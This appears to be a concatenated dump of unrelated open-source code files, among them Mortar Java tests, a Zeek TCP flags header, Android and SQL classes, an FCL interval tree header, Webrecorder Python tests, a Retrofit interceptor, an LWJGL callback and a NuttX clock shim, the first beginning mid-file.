@Override public void onEnterScope(MortarScope scope) {
}
@Override public void onLoad(Bundle savedInstanceState) {
}
@Override public void onSave(Bundle outState) {
saves.incrementAndGet();
activityScope.destroy();
}
@Override public void onExitScope() {
destroys.incrementAndGet();
}
}
BundleService bundleService = getBundleService(activityScope);
bundleService.register(new Destroyer());
bundleService.register(new Destroyer());
Bundle b = new Bundle();
BundleServiceRunner bundleServiceRunner = getBundleServiceRunner(activityScope);
bundleServiceRunner.onCreate(b);
bundleServiceRunner.onSaveInstanceState(b);
assertThat(destroys.get()).isEqualTo(2);
assertThat(saves.get()).isEqualTo(1);
}
@Test public void deliversStateToBundlerWhenRegisterAfterOnCreate() {
class SavesAndRestores extends MyBundler {
SavesAndRestores() {
super("sNr");
}
boolean restored;
@Override public void onLoad(Bundle savedInstanceState) {
super.onLoad(savedInstanceState);
restored = savedInstanceState != null && savedInstanceState.getBoolean("fred");
}
@Override public void onSave(Bundle outState) {
super.onSave(outState);
outState.putBoolean("fred", true);
}
}
class Top extends MyBundler {
Top() {
super("top");
}
final SavesAndRestores child = new SavesAndRestores();
@Override public void onLoad(Bundle savedInstanceState) {
super.onLoad(savedInstanceState);
MortarScope childScope = activityScope.buildChild().build("child");
getBundleService(childScope).register(child);
}
}
Top originalTop = new Top();
getBundleService(activityScope).register(originalTop);
assertThat(originalTop.child.restored).isFalse();
Bundle bundle = new Bundle();
getBundleServiceRunner(activityScope).onSaveInstanceState(bundle);
newProcess();
getBundleServiceRunner(activityScope).onCreate(bundle);
Top newTop = new Top();
getBundleService(activityScope).register(newTop);
assertThat(newTop.child.restored).isTrue();
}
/** <a href="https://github.com/square/mortar/issues/46">Issue 46</a> */
@Test public void registerWithDescendantScopesCreatedDuringParentOnCreateGetOnlyOneOnLoadCall() {
final MyBundler childBundler = new MyBundler("child");
final MyBundler grandChildBundler = new MyBundler("grandChild");
final AtomicBoolean spawnSubScope = new AtomicBoolean(false);
getBundleService(activityScope).register(new MyBundler("outer") {
@Override public void onLoad(Bundle savedInstanceState) {
if (spawnSubScope.get()) {
MortarScope childScope = activityScope.buildChild().build("child scope");
getBundleService(childScope).register(childBundler);
// 1. We're in the middle of loading, so the usual register > load call doesn't happen.
assertThat(childBundler.loaded).isFalse();
MortarScope grandchildScope = childScope.buildChild().build("grandchild scope");
getBundleService(grandchildScope).register(grandChildBundler);
assertThat(grandChildBundler.loaded).isFalse();
}
}
});
spawnSubScope.set(true);
getBundleServiceRunner(activityScope).onCreate(null);
// 2. But load is called before the onCreate chain ends.
assertThat(childBundler.loaded).isTrue();
assertThat(grandChildBundler.loaded).isTrue();
}
/**
* Happened during first naive fix of
* <a href="https://github.com/square/mortar/issues/46">Issue 46</a>.
*/
@Test public void descendantScopesCreatedDuringParentOnLoadAreNotStuckInLoadingMode() {
getBundleService(activityScope).register(new MyBundler("outer") {
@Override public void onLoad(Bundle savedInstanceState) {
MortarScope child = activityScope.buildChild().build("subscope");
child.buildChild().build("subsubscope");
}
});
getBundleServiceRunner(activityScope).onSaveInstanceState(new Bundle());
// No crash? Victoire!
}
/**
* https://github.com/square/mortar/issues/77
*/
@Test public void childCreatedDuringMyLoadDoesLoadingAfterMe() {
getBundleServiceRunner(activityScope).onCreate(null);
final MyBundler childBundler = new MyBundler("childBundler");
getBundleService(activityScope).register(new MyBundler("root") {
@Override public void onLoad(Bundle savedInstanceState) {
super.onLoad(savedInstanceState);
MortarScope childScope = activityScope.buildChild().build("childScope");
getBundleService(childScope).register(childBundler);
assertThat(childBundler.loaded).isFalse();
}
});
assertThat(childBundler.loaded).isTrue();
}
/**
* https://github.com/square/mortar/issues/77
*/
@Test public void bundlersInChildScopesLoadAfterBundlersOnParent() {
final List<Bundler> loadingOrder = new ArrayList<>();
// rootBundler#onLoad creates a child scope and registers childBundler on it,
// and after that registers a serviceBundler on the higher level
// activity scope. The service must receive onLoad before the child does.
getBundleServiceRunner(activityScope).onCreate(null);
final MyBundler serviceOnActivityScope = new MyBundler("service") {
@Override public void onLoad(Bundle savedInstanceState) {
super.onLoad(savedInstanceState);
loadingOrder.add(this);
}
};
final MyBundler childBundler = new MyBundler("childBundler") {
@Override public void onLoad(Bundle savedInstanceState) {
super.onLoad(savedInstanceState);
loadingOrder.add(this);
}
};
MyBundler rootBundler = new MyBundler("root") {
@Override public void onLoad(Bundle savedInstanceState) {
loadingOrder.add(this);
MortarScope childScope = activityScope.buildChild().build("childScope");
getBundleService(childScope).register(childBundler);
getBundleService(activityScope).register(serviceOnActivityScope);
}
};
getBundleService(activityScope).register(rootBundler);
assertThat(loadingOrder.size()).isEqualTo(3);
assertThat(loadingOrder.get(0)).isSameAs(rootBundler);
assertThat(loadingOrder.get(1)).isSameAs(serviceOnActivityScope);
assertThat(loadingOrder.get(2)).isSameAs(childBundler);
}
/** https://github.com/square/mortar/issues/131 */
@Test public void destroyingWhileSaving() {
final MortarScope[] currentScreen = new MortarScope[] { null };
MortarScope screenSwapperScope = activityScope.buildChild().build("screenOne");
getBundleService(screenSwapperScope).register(new MyBundler("screenSwapper") {
@Override public void onSave(Bundle outState) {
currentScreen[0].destroy();
}
});
final MortarScope screenOneScope = screenSwapperScope.buildChild().build("screenOne");
getBundleService(screenOneScope).register(new MyBundler("bundlerOne"));
currentScreen[0] = screenOneScope;
final MortarScope screenTwoScope = screenSwapperScope.buildChild().build("screenTwo");
getBundleService(screenTwoScope).register(new MyBundler("bundlerTwo"));
getBundleServiceRunner(activityScope).onSaveInstanceState(new Bundle());
}
// Make sure that when a scope dies, a new scope with the same name doesn't
// accidentally receive the old one's bundle.
@Test public void endScopeEndBundle() {
MyBundler fooBundler = new MyBundler("fooBundler") {
@Override public void onLoad(Bundle savedInstanceState) {
assertThat(savedInstanceState).isNull();
}
@Override public void onSave(Bundle outState) {
outState.putString("baz", "bang");
}
};
// First visit to the foo screen, bundle will be null.
MortarScope fooScope = activityScope.buildChild().build("fooScope");
getBundleService(fooScope).register(fooBundler);
// Android saves state
Bundle state = new Bundle();
getBundleServiceRunner(activityScope).onSaveInstanceState(state);
// We leave the foo screen.
fooScope.destroy();
// And now we come back to it. New instance's onLoad should also get a null bundle.
fooScope = activityScope.buildChild().build("fooScope");
getBundleService(fooScope).register(fooBundler);
}
class FauxActivity {
final MyBundler rootBundler = new MyBundler("core");
MortarScope childScope;
MyBundler childBundler = new MyBundler("child");
void create(Bundle bundle) {
getBundleServiceRunner(activityScope).onCreate(bundle);
getBundleService(activityScope).register(rootBundler);
childScope = activityScope.buildChild().build("child");
getBundleService(childScope).register(childBundler);
}
}
/** Simulate a new process by creating brand new scope instances. */
private void newProcess() {
newProcess("activity");
}
private void newProcess(String activityScopeName) {
MortarScope root = MortarScope.buildRootScope().build(activityScopeName);
activityScope = root.buildChild()
.withService(BundleServiceRunner.SERVICE_NAME, new BundleServiceRunner())
.build("activity");
}
private static Context mockContext(MortarScope root) {
final MortarScope scope = root;
Context appContext = mock(Context.class);
when(appContext.getSystemService(anyString())).thenAnswer(new Answer<Object>() {
@Override public Object answer(InvocationOnMock invocation) throws Throwable {
String name = (String) invocation.getArguments()[0];
return scope.hasService(name) ? scope.getService(name) : null;
}
});
return appContext;
}
private static class MyBundler implements Bundler {
final String name;
MortarScope registered;
boolean loaded;
Bundle lastLoaded;
Bundle lastSaved;
boolean destroyed;
public MyBundler(String name) {
this.name = name;
}
void reset() {
lastSaved = lastLoaded = null;
loaded = destroyed = false;
}
@Override public String getMortarBundleKey() {
return name;
}
@Override public void onEnterScope(MortarScope scope) {
this.registered = scope;
}
@Override public void onLoad(Bundle savedInstanceState) {
loaded = true;
lastLoaded = savedInstanceState;
if (savedInstanceState != null) {
assertThat(savedInstanceState.get("key")).isEqualTo(name);
}
}
@Override public void onSave(Bundle outState) {
lastSaved = outState;
outState.putString("key", name);
}
@Override public void onExitScope() {
destroyed = true;
}
}
}
| 7,783 |
2,181 | #pragma once
// This needs to remain the first include in this file, or some defines aren't
// set correctly when netinet/tcp.h is included and the CentOS 7 build breaks.
// clang-format off
#include "zeek/net_util.h"
#include <netinet/tcp.h>
#include <sys/types.h>
#include <string>
// clang-format on
namespace zeek::analyzer::tcp
{
class TCP_Flags
{
public:
TCP_Flags(const struct tcphdr* tp) { flags = tp->th_flags; }
TCP_Flags() { flags = 0; }
bool SYN() const { return flags & TH_SYN; }
bool FIN() const { return flags & TH_FIN; }
bool RST() const { return flags & TH_RST; }
bool ACK() const { return flags & TH_ACK; }
bool URG() const { return flags & TH_URG; }
bool PUSH() const { return flags & TH_PUSH; }
std::string AsString() const;
protected:
u_char flags;
};
inline std::string TCP_Flags::AsString() const
{
char tcp_flags[10];
char* p = tcp_flags;
if ( SYN() )
*p++ = 'S';
if ( FIN() )
*p++ = 'F';
if ( RST() )
*p++ = 'R';
if ( ACK() )
*p++ = 'A';
if ( PUSH() )
*p++ = 'P';
if ( URG() )
*p++ = 'U';
*p++ = '\0';
return tcp_flags;
}
} // namespace zeek::analyzer::tcp
| 468 |
726 | <reponame>xqgdmg/DavidNBA-master
package com.yuyh.library.view.list.indexablelistview;
import android.content.Context;
import android.graphics.Color;
import android.view.Gravity;
import android.widget.FrameLayout;
import android.widget.ProgressBar;
import android.widget.TextView;
/**
* 搜索部分 相关
* Created by YoKeyword on 16/3/25.
*/
public class SearchLayout extends FrameLayout {
private ProgressBar mSearchProgressBar;
private TextView mTvTip;
public SearchLayout(Context context) {
super(context);
init(context);
}
private void init(Context context) {
setBackgroundColor(Color.WHITE);
mSearchProgressBar = new ProgressBar(context);
int searchSize = IndexBar.dp2px(context, 20);
LayoutParams paramsSerach = new LayoutParams(searchSize, searchSize);
paramsSerach.gravity = Gravity.CENTER_HORIZONTAL;
paramsSerach.topMargin = searchSize;
mTvTip = new TextView(context);
LayoutParams paramsTip = new LayoutParams(LayoutParams.WRAP_CONTENT, LayoutParams.WRAP_CONTENT);
paramsTip.gravity = Gravity.CENTER_HORIZONTAL;
paramsTip.topMargin = searchSize;
mTvTip.setText("没有搜索到匹配内容");
mTvTip.setTextSize(12f);
mTvTip.setTextColor(Color.GRAY);
addView(mTvTip, paramsTip);
addView(mSearchProgressBar, paramsSerach);
setVisibility(GONE);
}
void showProgress() {
if (getVisibility() != VISIBLE) {
setVisibility(VISIBLE);
}
if (mSearchProgressBar.getVisibility() != VISIBLE) {
mSearchProgressBar.setVisibility(VISIBLE);
}
if (mTvTip.getVisibility() == VISIBLE) {
mTvTip.setVisibility(INVISIBLE);
}
}
void showTip() {
if (getVisibility() != VISIBLE) {
setVisibility(VISIBLE);
}
if (mSearchProgressBar.getVisibility() == VISIBLE) {
mSearchProgressBar.setVisibility(INVISIBLE);
}
if (mTvTip.getVisibility() != VISIBLE) {
mTvTip.setVisibility(VISIBLE);
}
}
void hide() {
if (getVisibility() == VISIBLE) {
setVisibility(GONE);
}
}
boolean isProgressVisible() {
if (getVisibility() != VISIBLE) {
return false;
}
return mSearchProgressBar.getVisibility() == VISIBLE;
}
}
| 1,073 |
480 | <reponame>weicao/galaxysql<filename>polardbx-calcite/src/main/java/org/apache/calcite/sql/SqlAlterTableGroupRenamePartition.java<gh_stars>100-1000
/*
* Copyright [2013-2021], Alibaba Group Holding Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.calcite.sql;
import com.alibaba.polardbx.common.utils.Pair;
import org.apache.calcite.sql.parser.SqlParserPos;
import java.util.List;
/**
* Created by luoyanxin.
*
* @author luoyanxin
*/
public class SqlAlterTableGroupRenamePartition extends SqlAlterSpecification {
private static final SqlOperator OPERATOR =
new SqlSpecialOperator("RENAME PARTITION", SqlKind.ALTER_TABLEGROUP_RENAME_PARTITION);
private final List<Pair<String, String>> changePartitionsPair;
private SqlAlterTableGroup parent;
public SqlAlterTableGroupRenamePartition(SqlParserPos pos, List<Pair<String, String>> changePartitionsPair) {
super(pos);
this.changePartitionsPair = changePartitionsPair;
}
@Override
public SqlOperator getOperator() {
return OPERATOR;
}
public void setParent(SqlAlterTableGroup parent) {
this.parent = parent;
}
@Override
public List<SqlNode> getOperandList() {
return null;
}
public List<Pair<String, String>> getChangePartitionsPair() {
return changePartitionsPair;
}
public SqlAlterTableGroup getParent() {
return parent;
}
}
| 681 |
971 | package com.ucar.datalink.manager.core.coordinator;
/**
* Created by lubiao on 2016/12/1.
*/
public class GroupConfig {
private int groupMinSessionTimeoutMs;
private int groupMaxSessionTimeoutMs;
public GroupConfig(int groupMinSessionTimeoutMs, int groupMaxSessionTimeoutMs) {
this.groupMinSessionTimeoutMs = groupMinSessionTimeoutMs;
this.groupMaxSessionTimeoutMs = groupMaxSessionTimeoutMs;
}
public int getGroupMinSessionTimeoutMs() {
return groupMinSessionTimeoutMs;
}
public void setGroupMinSessionTimeoutMs(int groupMinSessionTimeoutMs) {
this.groupMinSessionTimeoutMs = groupMinSessionTimeoutMs;
}
public int getGroupMaxSessionTimeoutMs() {
return groupMaxSessionTimeoutMs;
}
public void setGroupMaxSessionTimeoutMs(int groupMaxSessionTimeoutMs) {
this.groupMaxSessionTimeoutMs = groupMaxSessionTimeoutMs;
}
}
| 305 |
921 | /*
* Software License Agreement (BSD License)
*
* Copyright (c) 2011-2014, <NAME>, Inc.
* Copyright (c) 2014-2016, Open Source Robotics Foundation
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials provided
* with the distribution.
* * Neither the name of Open Source Robotics Foundation nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
/** @author <NAME> */
#ifndef FCL_INTERVAL_TREE_H
#define FCL_INTERVAL_TREE_H
#include <deque>
#include <limits>
#include <cstdlib>
#include <iostream>
#include "fcl/broadphase/detail/interval_tree_node.h"
namespace fcl {
namespace detail {
/// @brief Class describes the information needed when we take the
/// right branch in searching for intervals but possibly come back
/// and check the left branch as well.
template <typename S>
struct FCL_EXPORT it_recursion_node
{
public:
IntervalTreeNode<S>* start_node;
unsigned int parent_index;
bool try_right_branch;
};
using it_recursion_nodef = it_recursion_node<float>;
using it_recursion_noded = it_recursion_node<double>;
extern template
struct it_recursion_node<double>;
/// @brief Interval tree
template <typename S>
class FCL_EXPORT IntervalTree
{
public:
IntervalTree();
~IntervalTree();
/// @brief Print the whole interval tree
void print() const;
/// @brief Delete one node of the interval tree
SimpleInterval<S>* deleteNode(IntervalTreeNode<S>* node);
/// @brief delete node stored a given interval
void deleteNode(SimpleInterval<S>* ivl);
/// @brief Insert one node of the interval tree
IntervalTreeNode<S>* insert(SimpleInterval<S>* new_interval);
/// @brief get the predecessor of a given node
IntervalTreeNode<S>* getPredecessor(IntervalTreeNode<S>* node) const;
/// @brief Get the successor of a given node
IntervalTreeNode<S>* getSuccessor(IntervalTreeNode<S>* node) const;
/// @brief Return result for a given query
std::deque<SimpleInterval<S>*> query(S low, S high);
protected:
IntervalTreeNode<S>* root;
IntervalTreeNode<S>* nil;
/// @brief left rotation of tree node
void leftRotate(IntervalTreeNode<S>* node);
/// @brief right rotation of tree node
void rightRotate(IntervalTreeNode<S>* node);
/// @brief Inserts node into the tree as if it were a regular binary tree
void recursiveInsert(IntervalTreeNode<S>* node);
/// @brief recursively print a subtree
void recursivePrint(IntervalTreeNode<S>* node) const;
/// @brief recursively find the node corresponding to the interval
IntervalTreeNode<S>* recursiveSearch(IntervalTreeNode<S>* node, SimpleInterval<S>* ivl) const;
/// @brief Travels up to the root fixing the max_high fields after an insertion or deletion
void fixupMaxHigh(IntervalTreeNode<S>* node);
void deleteFixup(IntervalTreeNode<S>* node);
private:
unsigned int recursion_node_stack_size;
it_recursion_node<S>* recursion_node_stack;
unsigned int current_parent;
unsigned int recursion_node_stack_top;
};
using IntervalTreef = IntervalTree<float>;
using IntervalTreed = IntervalTree<double>;
} // namespace detail
} // namespace fcl
#include "fcl/broadphase/detail/interval_tree-inl.h"
#endif
| 1,421 |
1,217 | <gh_stars>1000+
from .testutils import FullStackTests, FakeStrictRedis
import os
import json
from mock import patch
from webrecorder.utils import today_str
from webrecorder.models.stats import Stats
from webrecorder.browsermanager import BrowserManager
# ============================================================================
def mock_load_all_browsers(self):
self.browsers = {
'chrome:60': {'name': 'Chrome'},
'firefox:53': {'name': 'Firefox'}
}
def mock_new_browser(key):
def do_mock(self, url, data):
data['reqid'] = 'ABCDEFG'
TestBrowserInit.browser_redis.hmset(key, data)
return {'id': data['browser'], 'reqid': 'ABCDEFG'}
return do_mock
def mock_reqid_to_user_params(self, reqid):
return TestBrowserInit.browser_redis.hgetall('up:test')
def mock_browser_sesh_id(self, reqid):
return
# ============================================================================
@patch('webrecorder.browsermanager.BrowserManager.browser_sesh_id', mock_browser_sesh_id)
class TestBrowserInit(FullStackTests):
rec_name = None
browser_redis = None
@classmethod
def setup_class(cls):
with patch('webrecorder.browsermanager.BrowserManager.load_all_browsers', mock_load_all_browsers):
os.environ['NO_REMOTE_BROWSERS'] = '0'
super(TestBrowserInit, cls).setup_class()
cls.browser_redis = FakeStrictRedis.from_url(os.environ['REDIS_BROWSER_URL'], decode_responses=True)
@classmethod
def teardown_class(cls):
os.environ.pop('NO_REMOTE_BROWSERS', '')
BrowserManager.running = False
super(TestBrowserInit, cls).teardown_class()
def test_create_coll_and_rec(self):
res = self._anon_post('/api/v1/collections?user={user}', params={'title': 'temp'})
res = self._anon_post('/api/v1/recordings?user={user}&coll=temp')
assert self.testapp.cookies['__test_sesh'] != ''
TestBrowserInit.rec_name = res.json['recording']['id']
assert TestBrowserInit.rec_name
def test_create_remote_browser_for_record(self):
params = {
'browser': 'chrome:60',
'user': self.anon_user,
'coll': 'temp',
'rec': TestBrowserInit.rec_name,
'url': 'http://example.com/',
'mode': 'record'
}
with patch('webrecorder.browsermanager.BrowserManager._api_new_browser', mock_new_browser('up:test')):
res = self.testapp.get('/api/v1/create_remote_browser', params=params)
assert res.json == {'reqid': 'ABCDEFG',
'browser': 'chrome:60',
'browser_data': {'name': 'Chrome'},
'inactive_time': 60,
'timestamp': '',
'url': 'http://example.com/',
}
res = self.browser_redis.hgetall('up:test')
assert res['timestamp'] == ''
assert res['sources'] == ''
assert res['inv_sources'] == ''
assert res['patch_rec'] == ''
assert res['type'] == 'record'
assert set(res.keys()) == {'user', 'remote_ip',
'ip', 'id', 'type',
'coll', 'coll_name',
'rec', 'patch_rec',
'url', 'timestamp',
'sources', 'inv_sources',
'browser', 'browser_can_write',
'reqid',
}
def test_create_browser_for_embed_patch(self):
params = {
'user': self.anon_user,
'coll': 'temp',
'url': 'http://geocities.com/',
'timestamp': '1996',
'mode': 'extract:ia',
'browser': 'chrome:60',
'reqid': 'ABCDEFG',
}
res = self.testapp.post_json('/api/v1/new', params=params)
assert res.json['url']
assert res.json['rec_name']
assert res.json['patch_rec_name']
params['rec'] = res.json['rec_name']
params['patch_rec'] = res.json['patch_rec_name']
with patch('webrecorder.browsermanager.BrowserManager._api_new_browser', mock_new_browser('up:test2')):
res = self.testapp.get('/api/v1/create_remote_browser', params=params)
assert res.json == {'reqid': 'ABCDEFG',
'browser': 'chrome:60',
'browser_data': {'name': 'Chrome'},
'inactive_time': 60,
'timestamp': '1996',
'url': 'http://geocities.com/',
}
res = self.browser_redis.hgetall('up:test2')
assert res['timestamp'] == '1996'
assert res['sources'] == 'ia'
assert res['inv_sources'] == 'ia'
assert res['patch_rec'] != ''
assert res['type'] == 'extract'
assert set(res.keys()) == {'user', 'remote_ip',
'ip', 'id', 'type',
'coll', 'coll_name',
'rec', 'patch_rec',
'url', 'timestamp',
'sources', 'inv_sources',
'browser', 'browser_can_write',
'reqid',
}
def test_create_browser_error_invalid_mode(self):
params = {
'user': self.anon_user,
'coll': 'temp',
'rec': TestBrowserInit.rec_name,
'url': 'http://geocities.com/',
'timestamp': '1996',
'mode': 'foo',
'browser': 'chrome:60',
}
with patch('webrecorder.browsermanager.BrowserManager._api_new_browser', mock_new_browser('up:test3')):
res = self.testapp.get('/api/v1/create_remote_browser', params=params, status=400)
assert res.json['error'] == 'invalid_mode'
def test_create_browser_error_no_rec(self):
params = {
'user': self.anon_user,
'coll': 'temp',
'url': 'http://geocities.com/',
'mode': 'record',
'browser': 'chrome:60',
}
with patch('webrecorder.browsermanager.BrowserManager._api_new_browser', mock_new_browser('up:test3')):
res = self.testapp.get('/api/v1/create_remote_browser', params=params, status=404)
assert res.json['error'] == 'no_such_recording'
def test_browser_stats(self):
assert self.redis.keys(Stats.BROWSERS_KEY.format('*')) == [Stats.BROWSERS_KEY.format('chrome:60')]
assert self.redis.hget(Stats.BROWSERS_KEY.format('chrome:60'), today_str()) == '4'
def test_record_put_record(self):
with patch('webrecorder.browsermanager.BrowserManager._api_reqid_to_user_params', mock_reqid_to_user_params):
res = self.testapp.put('/api/v1/remote/put-record?reqid=ABCDEF&target_uri=custom:///test.txt', params=b'Test Resource\nData',
headers={'Content-Type': 'text/other'})
assert res.json['WARC-Date']
# session should not change
assert 'Set-Cookie' not in res.headers
def test_replay_resource(self):
assert self.testapp.cookies['__test_sesh'] != ''
res = self._anon_get('/{user}/temp/mp_/custom:///test.txt')
assert res.headers['Content-Type'] == 'text/other'
assert 'Test Resource\nData' == res.text
| 3,843 |
1,163 | // Copyright 2017-present, Facebook, Inc.
// All rights reserved.
//
// This source code is licensed under the license found in the
// LICENSE file in the root directory of this source tree.
//File: color_mapping.hh
#pragma once
#include <csv.h>
#include <algorithm>
#include <unordered_map>
#include <string>
#include <glm/glm.hpp>
#include "lib/debugutils.hh"
namespace render {
// A case-insensitive map, from a string to rgb
class ColorMappingReader final {
public:
// fname: a comma-separated csv with column:
// name,r,g,b. r,g,b are integers in range [0,255]
explicit ColorMappingReader(std::string fname) {
reader_.reset(new io::CSVReader<4>{fname});
reader_->read_header(io::ignore_extra_column, "name", "r", "g", "b");
std::string name;
unsigned int r, g, b;
while (reader_->read_row(name, r, g, b)) {
std::transform(name.begin(), name.end(), name.begin(), ::tolower);
colormap_.emplace(name, glm::vec3{r/255.0, g/255.0, b/255.0});
}
}
glm::vec3 get_color(std::string klass) {
std::transform(klass.begin(), klass.end(), klass.begin(), ::tolower);
auto itr = colormap_.find(klass);
if (itr == colormap_.end()) {
print_debug("Couldn't find color for class %s\n", klass.c_str());
return {0,0,0};
}
return itr->second;
}
glm::vec3 get_background_color() {
return colormap_["other"];
}
int size() const { return colormap_.size(); }
private:
std::unordered_map<std::string, glm::vec3> colormap_;
std::unique_ptr<io::CSVReader<4>> reader_;
};
}
| 668 |
331 | <gh_stars>100-1000
package com.lauzy.freedom.data.net.interceptor;
import android.support.annotation.NonNull;
import com.lauzy.freedom.data.net.constants.NetConstants;
import java.io.IOException;
import okhttp3.HttpUrl;
import okhttp3.Interceptor;
import okhttp3.Request;
import okhttp3.Response;
/**
* Desc : 切换BaseUrl拦截器
* Author : Lauzy
* Date : 2017/9/28
* Blog : http://www.jianshu.com/u/e76853f863a9
* Email : <EMAIL>
*/
public class BaseUrlInterceptor implements Interceptor {
@Override
public Response intercept(@NonNull Chain chain) throws IOException {
Request originalRequest = chain.request();
String urlHead = originalRequest.headers().get(NetConstants.Header.BASE_URL_HEAD);
HttpUrl oldHttpUrl = originalRequest.url();
// Request.Builder builder = originalRequest.newBuilder();
if (urlHead != null && !urlHead.isEmpty()) {
HttpUrl newBaseUrl;
Request.Builder builder;
// builder.removeHeader(NetConstants.Header.BASE_URL_HEAD);
if (NetConstants.Header.BAIDU_HEAD_CONTENT.equals(urlHead)) {
newBaseUrl = HttpUrl.parse(NetConstants.BASE_URL);
builder = originalRequest
.newBuilder()
.addHeader(NetConstants.Header.USER_AGENT, NetConstants.Header.USER_AGENT_CONTENT);
} else if (NetConstants.Header.BANDSINTOWN_HEAD_CONTENT.equals(urlHead)) {
newBaseUrl = HttpUrl.parse(NetConstants.BASE_ARTIST_URL);
builder = originalRequest.newBuilder();
} else if (NetConstants.Header.GECIMI_HEAD_CONTENT.equals(urlHead)) {
newBaseUrl = HttpUrl.parse(NetConstants.BASE_LRC_URL);
builder = originalRequest.newBuilder();
} else {
newBaseUrl = oldHttpUrl;
builder = originalRequest.newBuilder();
}
if (null == newBaseUrl) {
return null;
}
HttpUrl newFullUrl = oldHttpUrl
.newBuilder()
.scheme(newBaseUrl.scheme())
.host(newBaseUrl.host())
.port(newBaseUrl.port())
.build();
return chain.proceed(builder.url(newFullUrl).build());
} else {
return chain.proceed(originalRequest);
}
}
}
| 1,129 |
4,054 | <filename>modules/lwjgl/assimp/src/generated/java/org/lwjgl/assimp/AIFileReadProcI.java
/*
* Copyright LWJGL. All rights reserved.
* License terms: https://www.lwjgl.org/license
* MACHINE GENERATED FILE, DO NOT EDIT
*/
package org.lwjgl.assimp;
import org.lwjgl.system.*;
import org.lwjgl.system.libffi.*;
import static org.lwjgl.system.APIUtil.*;
import static org.lwjgl.system.MemoryUtil.*;
import static org.lwjgl.system.libffi.LibFFI.*;
/**
* <h3>Type</h3>
*
* <pre><code>
* size_t (*{@link #invoke}) (
* struct aiFile *pFile,
* char *pBuffer,
* size_t size,
* size_t count
* )</code></pre>
*/
@FunctionalInterface
@NativeType("aiFileReadProc")
public interface AIFileReadProcI extends CallbackI {
FFICIF CIF = apiCreateCIF(
FFI_DEFAULT_ABI,
ffi_type_pointer,
ffi_type_pointer, ffi_type_pointer, ffi_type_pointer, ffi_type_pointer
);
@Override
default FFICIF getCallInterface() { return CIF; }
@Override
default void callback(long ret, long args) {
long __result = invoke(
memGetAddress(memGetAddress(args)),
memGetAddress(memGetAddress(args + POINTER_SIZE)),
memGetAddress(memGetAddress(args + 2 * POINTER_SIZE)),
memGetAddress(memGetAddress(args + 3 * POINTER_SIZE))
);
apiClosureRetP(ret, __result);
}
/**
* File read procedure
*
* @param pFile file pointer to read from
* @param pBuffer the buffer to read the values
* @param size size in bytes of each element to be read
* @param count number of elements to be read
*
* @return the number of elements read
*/
@NativeType("size_t") long invoke(@NativeType("struct aiFile *") long pFile, @NativeType("char *") long pBuffer, @NativeType("size_t") long size, @NativeType("size_t") long count);
} | 770 |
1,006 | <reponame>eenurkka/incubator-nuttx
/****************************************************************************
* arch/arm/src/lpc17xx_40xx/lpc17_40_clockconfig.c
*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership. The
* ASF licenses this file to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance with the
* License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
****************************************************************************/
/****************************************************************************
* Included Files
****************************************************************************/
#include <nuttx/config.h>
/* This file is only a thin shell that includes the correct clock
* configuration logic for the selected LPC17xx/LPC40xx family. The correct
* file cannot be selected by the make system because it needs the
* intelligence that only exists in chip.h that can associate an
* LPC17xx/LPC40xx part number with an LPC17xx/LPC40xx family.
*
* The LPC176x and LPC178x_40xx system control block is *nearly* identical
* but we have found that the LPC178x_40xx is more sensitive to the ordering
* of certain operations. So, although the hardware seems very similar, the
* safer thing to do is to separate the LPC176x and LPC178x_40xx into
* separate files.
*/
#include <arch/lpc17xx_40xx/chip.h>
#if defined(LPC176x)
# include "lpc176x_clockconfig.c"
#elif defined(LPC178x_40xx)
# include "lpc178x_40xx_clockconfig.c"
#else
# error "Unrecognized LPC17xx/LPC40xx family"
#endif
/****************************************************************************
* Pre-processor Definitions
****************************************************************************/
/****************************************************************************
* Public Data
****************************************************************************/
/****************************************************************************
* Private Data
****************************************************************************/
/****************************************************************************
* Private Functions
****************************************************************************/
/****************************************************************************
* Public Functions
****************************************************************************/
| 635 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.